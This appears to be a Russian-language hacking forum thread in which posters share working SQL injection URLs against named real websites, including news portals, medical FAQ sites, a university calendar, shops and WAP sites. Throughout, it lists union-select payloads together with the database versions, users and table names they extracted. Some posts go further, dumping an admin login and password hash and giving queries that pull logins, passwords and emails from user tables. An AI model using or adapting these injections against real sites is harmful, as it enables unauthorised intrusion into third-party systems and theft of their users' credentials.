http://www.itscoldoutside.com/ Code: http://www.itscoldoutside.com/news.asp?id=1+or+1=(select+top+1+id+from+dtproperties)-- version: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) db_name: ICONews system_user: Clive вот что удалось раскрутить: Code: table_name column_name VW_test dtproperties 'id' 'objectid' 'property' 'value' 'uvalue' 'lvalue' 'version' NewsArticles sysconstraints 'constid' 'id' 'colid' 'spare1' 'status' 'actions' 'error' syssegments 'segment' 'name' 'status' t_jiaozhu 'jiaozhu' tbl_news vw_bcpMasterSysobjects 'tag' 'parent' 'Article!1!ID' 'Article!1!BradftonID' 'Article!1! Heading' 'Article!1! DateFeed' vw_googlenews VW_rss VW_top VW_xml p.s. первый раз
Site: (sibmedia.ru) Новостной портал. SQL: Code: http://sibmedia.ru/index.php?id=-10220+union+select+CONCAT_WS(CHAR(32,58,32%20%20),user(),database(),%20version()),null,2-- Рузелтат смотреть вверху. Таблицы : Code: [*]CHARACTER_SETS [*]COLLATION [*]COLLATION_CHARACTER_SET_APPLOCABILITY [*]COLUMNS [*]COLUMS_PRIVILEGES [*]KEY_COLUMN_USAGE [*]PROFILING [*]ROUTINES [*]CHEMATA [*]CHEMA_PRIVILEGES [*]STATISTICS [*]TABLES [*]TABLE_CONSTRAINTS [*]TABLE_PRIVILEGES [*]TRIGGERS [*]USER_PRIVILEGES [*]VIEWS [*]all_news [*]areas [*]static [*]vote
Code: http://www.ckat.ru/keywords/answer.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())/* Uwww63S@localhost:udb63:4.1.21-log Code: http://www.venereology.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9 mgido@localhost:mgido:5.0.45 Code: http://www.infomedical.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9 infomedical@localhost:infomedical:5.0.45
Code: http://www.beadstreet.com.au/listproducts.php?id=47+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1 version():4.1.20 database():beadstreet user():beadstre@localhost __ Code: http://www.bpsca.co.uk/products.php?id=147+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11+limit+1,1/* version():4.1.22-standard: database():bpsca_data user():bpsca_website@localhost __ Code: http://www.etver.ru/1forum/viewmessage.php?sid=1&id=29140+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9 version():5.0.77-log database():etver user():etver@localhost
http://vikings.vcsu.edu/php/details.php?id=-563'+union+select+1,2,table_name,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+879,1000+--+ Все таблицы заблокированны((
cinema.perm.ru Code: http://cinema.perm.ru/events/?id=-67+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6-- version():4.0.24_Debian-10sarge2-log database():dbcinema user():cinema@localhost
<<RUNAWAYBOX>> Code: http://www.runawaybox.com/video.php?vid=-396+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9--+ Code: http://www.runawaybox.com/admin/ 5.0.45:runawaybox:runawaybox@localhostortbld-freebsd6.2 -=admin=- log: runawaybox pass: $1$0lRFi.9p$5vaDEIDcwC/b/aQu/H1.g1 ):
online game thx for Saint mssql-inj поле логина,результат в урл ==================================================================================== version():4 ;( ==================================================================================== concat_ws(0x3a,version(),user(),database()):5.0.67-log:[email protected]:u30200
http://www.jc.edu/calendar/details.php?id=-4265+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11+from+information_schema.tables/*
Code: http://www.raznosvet.com/do/notice.php?id=-7590+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10-- version: 4.0.27-max-log database: razno user: [email protected] еще похекал сайт тур фирмы(mssql), пока выкладывать не буду
www.petpsych.com Code: http://www.petpsych.com/article_detail.php?id=-1+union+select+1,2,3,4,5,6-- version():5.0.67-community database()etpsych_main user()etpsych_petpsyc@localhost
<<msong.com.ru>> Code: http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.tables--+ 5.0.22:::admin_song1:::admin_song1@localhost:::redhat-linux-gnu - 3 tables where columns: password Code: http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.columns+where+column_name+like+'password'+limit+3,1--+
http://wap.jamango.ru/mangotop/index.php?action=top100&cat=-4+union+select+1,2,3,4,concat_ws(0x3a,url,email,password)+from+top_users/*
продолжим ломать вапики http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(version(),0x3a, user(),0x3a,database())/* 5.0.45-community-nt:likenetru@localhost:likenet акк брать из таблицы users http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(login,0x3a,password,0x3a,email)+from+ users/*
Code: http://www.zbulvar.ru/wap/newz.php?newsid=21498+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+limit+1,1/* version():5.0.32-Debian_7etch8-log database():zbulvar_pm user():zbulvar_pm@localhost
http://www.roymagazine.it/time/display.php?ID=179/**/UNION/**/SELECT/**/password,userid+from+user/* Database name: Sql33637_1 User name: [email protected] Database Version: 4.0.30-standard-log
Code: http://www.envapack.com/b2b/buyoffers.php?cid=-3+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+70,1# 5.0.67-community envapack_b2b envapack_root@localhost таблы Code: COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS b2b_admin b2b_ads b2b_affiliate_banner b2b_banned_words b2b_blocked b2b_blocked_countries b2b_businesstypes b2b_categories b2b_companyprofiles b2b_config b2b_contacts b2b_country b2b_currencies b2b_dateformats b2b_employees b2b_fav_cats b2b_favorites b2b_feedback b2b_groups b2b_icons b2b_levels b2b_mails b2b_markets b2b_members b2b_messages b2b_news b2b_newsletter b2b_offer_cats b2b_offer_cats_buy b2b_offer_images b2b_offers b2b_offers_buy b2b_online b2b_product_cats b2b_product_images b2b_productfocus b2b_products b2b_profile_cats b2b_profile_markets b2b_search_results b2b_signups b2b_stats b2b_styles b2b_timeformats b2b_tmp_email b2b_us_states [B]admin[/B] class config_file cours cours_user course_tool crs_ACTIPACK_accueil crs_ACTIPACK_announcement
_http://egenius.ru/seminar/arc.php?cid=-4+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9+-- версия:юзер:база 5.0.67-log:[email protected]:u96975_eg
<<дельфинчкигги>> http://www.ptpi-dolphins.org/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7-- plbginf_ptpi@localhostlbginf_ptpi:5.0.67-community
Code: http://wap.novonews.lv/index.php?mode=news&id=72419%27+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15+limit+1,1/* version():5.0.22-log database():novonews_v2 user():[email protected]
